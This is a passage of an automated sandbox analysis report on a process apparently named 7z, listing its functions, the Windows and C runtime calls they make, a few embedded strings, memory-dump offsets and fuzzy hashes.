                                • Instruction ID: 9da40836006195614ed4ea3872f11b7de369a6d7b733b15a189c3a06e9deb977
                                • Opcode Fuzzy Hash: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
                                • Instruction Fuzzy Hash: E411BFA630974091EB04DF2B99403A923619B16FDAF844026CF094738AFB6CCA4AD30E
                                Function 0041422C Relevance: 6.3, APIs: 5, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414272
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041427E
                                • _CxxThrowException.MSVCRT ref: 0041429C
                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004142C8
                                • _CxxThrowException.MSVCRT ref: 004142E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                • String ID:
                                • API String ID: 2296236218-0
                                • Opcode ID: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                                • Instruction ID: b8fec9e85e9cd8a25fc2801ab3dad24c40bc8cfa666d30cfd869764f98303c8b
                                • Opcode Fuzzy Hash: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                                • Instruction Fuzzy Hash: 602193B2704B4586D710DF56E85075EB7A1FB98B88F54812ADB8D83B24EF3CC885C708
                                Function 0041D460 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                                • Instruction ID: 960523f708549476db93a4f64dfefed781a26ea14c0092f8e3bc6ee54219c57b
                                • Opcode Fuzzy Hash: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                                • Instruction Fuzzy Hash: 6A118B3225454992CA10FB26F4513DEA320FBD1398F801217F69DC76A9DFACC995CB48
                                Function 00411874 Relevance: 6.3, APIs: 5, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                                • Instruction ID: 160e889afbc2277dbf9a3213bde3a9152f1d284ad9ab03140a260991831e8a72
                                • Opcode Fuzzy Hash: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                                • Instruction Fuzzy Hash: 0101A533742A5D96CA10EB36E5105AD6310E785FA8B584326DF395B7A0CF2CC8A28308
                                Function 0043C044 Relevance: 6.3, APIs: 5, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 0043C057
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438E74
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438E7D
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438EA8
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438EB0
                                  • Part of subcall function 00439930: free.MSVCRT ref: 00439962
                                  • Part of subcall function 00439930: free.MSVCRT ref: 0043996B
                                  • Part of subcall function 00439930: free.MSVCRT ref: 00439974
                                  • Part of subcall function 00439930: free.MSVCRT ref: 0043997C
                                • free.MSVCRT ref: 0043C072
                                • free.MSVCRT ref: 0043C07B
                                • free.MSVCRT ref: 0043C0A6
                                • free.MSVCRT ref: 0043C0AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                                • Instruction ID: 7492e7021409b5569118f5a194135951d21da006904901f344001d57f2256e35
                                • Opcode Fuzzy Hash: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                                • Instruction Fuzzy Hash: 94F0A223741A9896CA14EA37DA911AC1320AB84F98B480227AF2D9F751DF58CCB28344
                                Function 00441660 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                                • Instruction ID: 17520fc483ee104575a4cec5a594cb627ee1291454e9aa9aed0cb4cea764ff80
                                • Opcode Fuzzy Hash: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                                • Instruction Fuzzy Hash: 29F0C223B5194886D711EE3BE9502AC1320AB81FE8B5D0227DE2D5B364DE68CC928304
                                Function 0044B7B0 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                                • Instruction ID: be632c62114c7ef758912198de0a766f07550c3c48de3d48b5284417ca99e41f
                                • Opcode Fuzzy Hash: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                                • Instruction Fuzzy Hash: 3CF0AF23741A8C8A9B10AE37E9910AD12209F85BE874C0636EF1D4B700DE68CCA28344
                                Function 0046786C Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                                • Instruction ID: 4dd18e0329008573594547a32aae8477eee3acf275ed7b888d4b8a55f793173f
                                • Opcode Fuzzy Hash: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                                • Instruction Fuzzy Hash: A8F06223741A898ACB11AE3BE9510AD1321AB95FED7580227AE2D5F355DE6CCC92C344
                                Function 0044B820 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                                • Instruction ID: 18a5fa1f44d29c9b517db5d61a7d9194714d9acf253c2125ff6710dcd9688a71
                                • Opcode Fuzzy Hash: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                                • Instruction Fuzzy Hash: 1CF0C263B41A888ADB10BE37ED8129C1214EF45BEDB4C4636EE1D5B750DF68CCA38340
                                Function 00427F18 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                                • Instruction ID: 4fcf5d09abd5fdacc50303738207a6e6dab9245585b3546680f2bdc33fae46fc
                                • Opcode Fuzzy Hash: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                                • Instruction Fuzzy Hash: 48F06223755A5D868711AE37FA510AD1320AB95FD87590227EE2D9F354DE6CCC928304
                                Function 00466B38 Relevance: 6.3, APIs: 5, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 00466B57
                                • free.MSVCRT ref: 00466B63
                                • free.MSVCRT ref: 00466B6F
                                • free.MSVCRT ref: 00466B86
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B629
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B636
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B642
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B64C
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B656
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B660
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B66A
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B674
                                • free.MSVCRT ref: 00466B9C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                                • Instruction ID: d8c4d499aa62b2f9d6d3c275653ebe3049d0ea2c8f3c2d6937ceca0c078fa044
                                • Opcode Fuzzy Hash: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                                • Instruction Fuzzy Hash: B3F0FE3234174992CA18AB33E7952EC1320EB89B98F840126AF1D9B711DF6CD9F28345
                                Function 0044B890 Relevance: 6.3, APIs: 5, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                                • Instruction ID: 12fe8fdc6ac188a103d715ea968a37d85c2ada990a76863c03b144ca5cbf8048
                                • Opcode Fuzzy Hash: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                                • Instruction Fuzzy Hash: 6DE0AC72741A4D93CB04AA37DB9106C6324F785FA875442169F2D9B751DF68DCF28344
                                Function 00434348 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 153COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0042E708: free.MSVCRT ref: 0042E760
                                  • Part of subcall function 0042E708: free.MSVCRT ref: 0042E76B
                                • free.MSVCRT ref: 00434470
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: AES128$AES192$`3G
                                • API String ID: 1294909896-508572792
                                • Opcode ID: 0e676596fdedeffc0f05b2f5f26221d9abea9710fbb95b84d36198861f49beb1
                                • Instruction ID: 930bea6b7f9ea0895abd97d5018eff278818f2a846e0509b69acdc4abac31013
                                • Opcode Fuzzy Hash: 0e676596fdedeffc0f05b2f5f26221d9abea9710fbb95b84d36198861f49beb1
                                • Instruction Fuzzy Hash: D6517B73705A90A7DB60DB26E58039EB7A0F3C8B94F405117EB8D83B68DB38D995CB44
                                Function 0046428C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 004643BD
                                  • Part of subcall function 00412CF8: _CxxThrowException.MSVCRT ref: 00412D3A
                                • free.MSVCRT ref: 004643DD
                                • free.MSVCRT ref: 004643E7
                                  • Part of subcall function 00412E68: free.MSVCRT ref: 00412EA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow
                                • String ID: =
                                • API String ID: 4001284683-2525689732
                                • Opcode ID: 7bd62767a88c7f5a01b6c0810a0d90387d8eae1eeb3e04ae27efe085fa5956b5
                                • Instruction ID: 7016b39ca011ce7069a410cb62ad3e51a0c0fd9583ceef8a534a34f427c755d8
                                • Opcode Fuzzy Hash: 7bd62767a88c7f5a01b6c0810a0d90387d8eae1eeb3e04ae27efe085fa5956b5
                                • Instruction Fuzzy Hash: 1031D87231568096CF10DB16E49029EB720F7D17A4F945117FA5E83B68EBACC985CB05
                                Function 00455D74 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 00455EA0
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 004136A8: memmove.MSVCRT ref: 004136CD
                                • free.MSVCRT ref: 00455E92
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: exe
                                • API String ID: 1534225298-1801697008
                                • Opcode ID: 71fe5a71670546eb5239c1d0221a77139611f9aa0fd55ab8de3c3dedd5977562
                                • Instruction ID: 6437e2177fdd5e02cac45151fb9bfaf853b0a59d3d4f040d5291782392a5e034
                                • Opcode Fuzzy Hash: 71fe5a71670546eb5239c1d0221a77139611f9aa0fd55ab8de3c3dedd5977562
                                • Instruction Fuzzy Hash: 6131A5B2204A05E5CE30EF22E4515EE7B21E7857E9F844217EF9E07669DF2CC68AC704
                                Function 0042C0A4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot open input file
                                • API String ID: 1294909896-2161566465
                                • Opcode ID: b6eff4b6adadf68d20c289e159feee7c43496f54bb6918b263f6027a8c7075c0
                                • Instruction ID: 1595d1ac58e7dc6cca048cbfe9175f48883f74c1d9eeef22d3c10427a04da5e8
                                • Opcode Fuzzy Hash: b6eff4b6adadf68d20c289e159feee7c43496f54bb6918b263f6027a8c7075c0
                                • Instruction Fuzzy Hash: 9421C832304B5581CB219B36F85176E2760E789BE8F880327AE6E47395DF2CC456CB18
                                Function 00447EB0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ByteStringmemmove
                                • String ID:
                                • API String ID: 400576877-0
                                • Opcode ID: 6306eab75d0bcf35012ff53b51694f96dc674e81e0989501ab697269fd58a1c2
                                • Instruction ID: a6dd75fdae7b582abc4682d26395f65ba043ba93941b3890beef3a6ecf0a2b6e
                                • Opcode Fuzzy Hash: 6306eab75d0bcf35012ff53b51694f96dc674e81e0989501ab697269fd58a1c2
                                • Instruction Fuzzy Hash: 69218863319B4182FB249F52E5507AAB250FB88794F484226EF5A4B794DF7CC866C348
                                Function 0043FA90 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 76stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00414D94: _CxxThrowException.MSVCRT ref: 00414D83
                                • strlen.MSVCRT ref: 0043FB27
                                • free.MSVCRT ref: 0043FB74
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrowfreestrlen
                                • String ID: <>G$sums
                                • API String ID: 265379646-1542415585
                                • Opcode ID: 305e3ed5d5dfea361775f1e56a821dd3c3c9aa452a04671e9f2de4d4a570ad42
                                • Instruction ID: bb6aa196d16f3319bf58bde243dd5a045f97c766a5066bac8f8f7bb2d8fe9f24
                                • Opcode Fuzzy Hash: 305e3ed5d5dfea361775f1e56a821dd3c3c9aa452a04671e9f2de4d4a570ad42
                                • Instruction Fuzzy Hash: 7A21047230460055DE20EF16FA913EE9721AB89BECF445227EE594B3A5DF3CC58AC308
                                Function 00448BA4 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$wcscmp
                                • String ID:
                                • API String ID: 4021281200-0
                                • Opcode ID: 85368f472c2565e39e1379fdb09b27c90018d9c80aa8451b196272df9c379c91
                                • Instruction ID: ce2443160be46d4d7d1602fd5c4e37b74ebab0baedb54d234c4c9f0389c8a4c4
                                • Opcode Fuzzy Hash: 85368f472c2565e39e1379fdb09b27c90018d9c80aa8451b196272df9c379c91
                                • Instruction Fuzzy Hash: 4E21F37320474596EB20EF26E58026D7720F789BE8F04431AAF2987794EF3CD996C744
                                Function 00423C20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Unsupported charset:
                                • API String ID: 1294909896-616772432
                                • Opcode ID: af49dab0716dd56378aafb27f7c9511f5796b18d30d98875e15fa81bbabf670f
                                • Instruction ID: a1419898fd135a9df35d855ab9c69d7d1df61b36334b06ae38f90dddf46aa6c3
                                • Opcode Fuzzy Hash: af49dab0716dd56378aafb27f7c9511f5796b18d30d98875e15fa81bbabf670f
                                • Instruction Fuzzy Hash: D821A173304A0492DA209F19E88029D6B30E7C47E8F945227EBAE47774CF6CCA86C708
                                Function 00417474 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNELBASE ref: 004186EA
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNEL32 ref: 00418721
                                  • Part of subcall function 004186C8: free.MSVCRT ref: 0041872E
                                • DeleteFileW.KERNEL32 ref: 004174BC
                                • DeleteFileW.KERNEL32 ref: 004174F6
                                • free.MSVCRT ref: 00417506
                                • free.MSVCRT ref: 00417514
                                  • Part of subcall function 00416FCC: SetFileAttributesW.KERNELBASE ref: 00416FF3
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
